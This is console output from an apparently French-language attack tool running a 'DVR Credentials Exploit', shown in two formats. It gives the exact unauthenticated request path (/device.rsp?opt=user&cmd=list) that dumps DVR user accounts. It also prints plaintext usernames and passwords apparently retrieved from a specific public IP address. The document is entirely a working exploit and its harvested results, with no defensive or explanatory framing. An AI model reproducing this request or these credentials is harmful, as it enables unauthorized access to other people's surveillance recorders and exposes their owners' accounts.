===== DVR Credentials Exploit =====

[DVR Credentials Exploit] - Entrez l'adresse IP et port (<ip>:<port>, port par défaut 80): 178.233.224.65:80

[Info] Envoi de la requête à : http://178.233.224.65:80/device.rsp?opt=user&cmd=list

┌────────────┬──────────────────┬─────────┐
│  Username  │     Password     │ Role ID │
├────────────┼──────────────────┼─────────┤
│ admin      │ holyshit         │ 2       │
│ system     │ HIvision@!23     │ 3       │
└────────────┴──────────────────┴─────────┘


[iS-Tool Info] - Appuie sur Entrée pour revenir au menu...





===== DVR Credentials Exploit - Tapez 'q' ou 'quit' pour quitter =====

[DVR Credentials Exploit] - Entrez l'adresse IP et port (<ip>:<port>, port par défaut 80): 178.233.224.65:80
[DVR Credentials Exploit] - Envoi de la requête à : http://178.233.224.65:80/device.rsp?opt=user&cmd=list
[DVR Credentials Exploit] - Exploit sucessfuly executed ! (X Users/Passwd found !)

┌───────────────── [DVR Credentials Exploit] ─────────────────┐
├─ [+] Username : Admin
├─ [+] Password : hncvdsdgsfqf
├─ [+] ID : 1
└─────────────────────────────────────────────────────────────┘
┌───────────────── [DVR Credentials Exploit] ─────────────────┐
├─ [+] Username : System
├─ [+] Password : hncvdsdgsfqf
├─ [+] ID : 2
└─────────────────────────────────────────────────────────────┘